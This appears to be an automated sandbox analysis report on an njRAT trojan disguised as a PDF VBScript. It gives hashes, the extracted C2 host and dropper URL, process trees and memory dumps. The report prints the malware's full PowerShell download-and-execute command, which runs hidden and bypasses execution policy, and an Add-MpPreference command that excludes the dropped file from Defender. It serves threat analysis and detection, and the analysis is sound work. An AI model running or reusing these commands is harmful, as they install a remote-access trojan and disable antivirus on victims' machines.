njrat | c34173dfa5a1a842bb14ef1fddd8f15b0998577740469b6987d138e165786994

General

Target

Documentacion.PDF.vbs
Size

162KB
MD5

16dd6afc5e63f4edc4f35fd1176e63bd
SHA1

d64a9461b703119695e76f880832924d487a648a
SHA256

c34173dfa5a1a842bb14ef1fddd8f15b0998577740469b6987d138e165786994
SHA512

3e2abe804b90ec51e1a7fb4145a0b11304e3d279c13cc3f65380721c079fb1b9711bb491e92b5e95c6ca957aeb7bfed9b33b030c094a1dcc3d4ebcab577b8df3

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

pedrobedoya2021.duckdns.org:1980

Mutex

cf13c225ff474d45b

Attributes

reg_key
cf13c225ff474d45b
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

9 1728 powershell.exe
11 1728 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Hostdyn.exeHostdyn.exe

pid process

920 Hostdyn.exe
1632 Hostdyn.exe

flow	pid	process
9	1728	powershell.exe
11	1728	powershell.exe

pid	process
920	Hostdyn.exe
1632	Hostdyn.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Documentacion.PDF.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Documentacion.PDF.vbs	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Hostdyn.exe

description pid process target process

PID 920 set thread context of 1632 920 Hostdyn.exe Hostdyn.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1728 powershell.exe
1728 powershell.exe
1728 powershell.exe
1696 powershell.exe

description	pid	process	target process
PID 920 set thread context of 1632	920	Hostdyn.exe	Hostdyn.exe

pid	process
1728	powershell.exe
1728	powershell.exe
1728	powershell.exe
1696	powershell.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

powershell.exepowershell.exeHostdyn.exe

description	pid	process
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe
Token: 33	1632	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1632	Hostdyn.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exeHostdyn.exe

description	pid	process	target process
PID 1316 wrote to memory of 1728	1316	WScript.exe	powershell.exe
PID 1316 wrote to memory of 1728	1316	WScript.exe	powershell.exe
PID 1316 wrote to memory of 1728	1316	WScript.exe	powershell.exe
PID 1728 wrote to memory of 920	1728	powershell.exe	Hostdyn.exe
PID 1728 wrote to memory of 920	1728	powershell.exe	Hostdyn.exe
PID 1728 wrote to memory of 920	1728	powershell.exe	Hostdyn.exe
PID 1728 wrote to memory of 920	1728	powershell.exe	Hostdyn.exe
PID 920 wrote to memory of 1696	920	Hostdyn.exe	powershell.exe
PID 920 wrote to memory of 1696	920	Hostdyn.exe	powershell.exe
PID 920 wrote to memory of 1696	920	Hostdyn.exe	powershell.exe
PID 920 wrote to memory of 1696	920	Hostdyn.exe	powershell.exe
PID 920 wrote to memory of 1632	920	Hostdyn.exe	Hostdyn.exe
PID 920 wrote to memory of 1632	920	Hostdyn.exe	Hostdyn.exe
PID 920 wrote to memory of 1632	920	Hostdyn.exe	Hostdyn.exe
PID 920 wrote to memory of 1632	920	Hostdyn.exe	Hostdyn.exe
PID 920 wrote to memory of 1632	920	Hostdyn.exe	Hostdyn.exe
PID 920 wrote to memory of 1632	920	Hostdyn.exe	Hostdyn.exe
PID 920 wrote to memory of 1632	920	Hostdyn.exe	Hostdyn.exe
PID 920 wrote to memory of 1632	920	Hostdyn.exe	Hostdyn.exe
PID 920 wrote to memory of 1632	920	Hostdyn.exe	Hostdyn.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Documentacion.PDF.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Users\Admin\AppData\Roaming\Hostdyn.exe
    "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:920
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1696
  - - C:\Users\Admin\AppData\Roaming\Hostdyn.exe
      "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1632

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Hostdyn.exe

MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe

MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe

MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
memory/920-67-0x0000000000630000-0x0000000000637000-memory.dmp

Filesize
28KB

Download
memory/920-64-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/920-69-0x0000000004120000-0x000000000413F000-memory.dmp

Filesize
124KB

Download
memory/920-68-0x0000000004C70000-0x0000000004CC4000-memory.dmp

Filesize
336KB

Download
memory/920-61-0x0000000000000000-mapping.dmp

Download
memory/920-66-0x0000000001F00000-0x0000000001F01000-memory.dmp

Filesize
4KB

Download
memory/1316-53-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp

Filesize
8KB

Download
memory/1632-74-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1632-72-0x000000000040677E-mapping.dmp

Download
memory/1632-80-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/1632-71-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1696-76-0x0000000075911000-0x0000000075913000-memory.dmp

Filesize
8KB

Download
memory/1696-70-0x0000000000000000-mapping.dmp

Download
memory/1696-77-0x0000000002470000-0x00000000030BA000-memory.dmp

Filesize
12.3MB

Download
memory/1696-78-0x0000000002470000-0x00000000030BA000-memory.dmp

Filesize
12.3MB

Download
memory/1696-79-0x0000000002470000-0x00000000030BA000-memory.dmp

Filesize
12.3MB

Download
memory/1728-59-0x0000000002974000-0x0000000002977000-memory.dmp

Filesize
12KB

Download
memory/1728-60-0x000000000297B000-0x000000000299A000-memory.dmp

Filesize
124KB

Download
memory/1728-54-0x0000000000000000-mapping.dmp

Download
memory/1728-58-0x0000000002972000-0x0000000002974000-memory.dmp

Filesize
8KB

Download
memory/1728-56-0x000007FEF2EE0000-0x000007FEF3A3D000-memory.dmp

Filesize
11.4MB

Download
memory/1728-57-0x0000000002970000-0x0000000002972000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads